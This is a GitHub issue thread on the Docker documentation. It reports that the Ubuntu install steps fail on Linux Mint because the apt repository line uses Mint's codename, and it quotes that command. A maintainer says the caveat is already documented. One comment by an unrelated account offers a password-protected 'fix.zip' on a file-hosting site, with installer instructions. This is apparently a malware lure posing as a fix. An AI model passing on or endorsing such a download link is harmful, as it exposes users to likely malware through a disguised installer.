### ISSUE TITLE
Installation on Linux mint isn't present in the docs.

### ISSUE THREAD

**Issue by EryX0** [docker/docs#20705]
### Is this a docs issue?

- [X] My issue is about the documentation content or website

### Type of issue

I can't find what I'm looking for

### Description

Installation on Linux mint isn't present in the docs, although the installation process is exactly like Ubuntu peer version (e.g: Wilma equals to Noble), so when a user tries to install mint with instructions, they don't find it, and when they try to install with Ubuntu tutorial, they can't install it because the installation because this line in the tutorial:

```sh
echo \
  "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu \
  $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
  sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
```

this places "wilma" as the code name in the apt sources list for docker, and then the repository can't update because docker doesn't have a "wilma" repository
but if we replace "wilma" with "noble" (assuming we have LM22), the update for the repo will work and the installation will go on smoothly

### Location

https://docs.docker.com/engine/install/ubuntu/

### Suggestion

add an exception to the command that converts Mint versions to Ubuntu equals (e.g: wilma to noble) before adding the version code name to the sources list.
OR we can inform users that mint has this caveat for installing using this tutorial.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dvdksn** [comment]
This callout is already present
<img width="784" alt="image" src="https://github.com/user-attachments/assets/85753def-60ad-4b39-9054-8cb9d733e3d2">
